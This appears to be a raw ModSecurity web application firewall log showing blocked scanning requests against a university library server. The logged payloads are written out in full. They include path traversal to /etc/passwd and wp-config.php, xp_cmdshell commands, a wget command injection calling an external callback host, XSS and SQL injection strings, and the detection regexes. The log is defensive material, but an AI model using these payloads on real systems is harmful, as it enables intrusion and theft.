[Tue Aug 29 11:45:29.419929 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAh13w0AAAAz"]
[Tue Aug 29 11:45:30.398455 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAhuiy4AAAAr"]
[Tue Aug 29 11:45:30.430910 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO136sCo-f0AAAh13xEAAAAz"]
[Tue Aug 29 11:45:35.463487 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAhlz6MAAAAi"]
[Tue Aug 29 11:45:36.527410 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAib5r8AAAAA"]
[Tue Aug 29 11:45:43.363558 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g4u5go1kk1au6p.oast.site found within TX:1: cjmnbitjmimt14dgn26g4u5go1kk1au6p.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAhtjfUAAAAq"]
[Tue Aug 29 11:45:47.468869 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAhBSCoAAAAX"]
[Tue Aug 29 11:45:48.673132 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAhlz7wAAAAi"]
[Tue Aug 29 11:45:49.014876 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-cCo-f0AAAdxUm8AAAAC"]
[Tue Aug 29 11:45:49.388245 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-cCo-f0AAAhZRgsAAAAG"]
[Tue Aug 29 11:45:51.454896 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAi3Z0AAAAAP"]
[Tue Aug 29 11:45:56.421109 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAfSWnIAAAAB"]
[Tue Aug 29 11:46:01.367651 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAhtjhsAAAAq"]
[Tue Aug 29 11:46:01.420432 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CcCo-f0AAAhrqNcAAAAo"]
[Tue Aug 29 11:46:02.413502 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAi@S-oAAAAM"]
[Tue Aug 29 11:46:02.432671 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAi@S-sAAAAM"]
[Tue Aug 29 11:46:07.389716 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26gd694z5ykmreya.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAhBSFcAAAAX"]
[Tue Aug 29 11:46:08.408649 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAfEB5wAAAAO"]
[Tue Aug 29 11:46:09.512650 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhtjjAAAAAq"]
[Tue Aug 29 11:46:09.547353 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAib5y4AAAAA"]
[Tue Aug 29 11:46:12.499921 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FMCo-f0AAAfEB7kAAAAO"]
[Tue Aug 29 11:46:12.522654 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAib5z4AAAAA"]
[Tue Aug 29 11:46:13.400084 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAhl0AkAAAAi"]
[Tue Aug 29 11:46:13.412380 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAi-Q-oAAAAH"]
[Tue Aug 29 11:46:13.465581 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAdxUrIAAAAC"]
[Tue Aug 29 11:46:14.417011 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAhl0A8AAAAi"]
[Tue Aug 29 11:46:15.360112 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14F8Co-f0AAAi2yCUAAAAN"]
[Tue Aug 29 11:46:15.607898 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAhl0BcAAAAi"]
[Tue Aug 29 11:46:18.411755 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAi5uEsAAAAS"]
[Tue Aug 29 11:46:18.502105 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAhZRmIAAAAG"]
[Tue Aug 29 11:46:19.496303 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14G8Co-f0AAAhrqRUAAAAo"]
[Tue Aug 29 11:46:19.500100 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAib52YAAAAA"]
[Tue Aug 29 11:46:20.383647 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAi0JK8AAAAK"]
[Tue Aug 29 11:46:22.424824 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAhT33YAAAAD"]
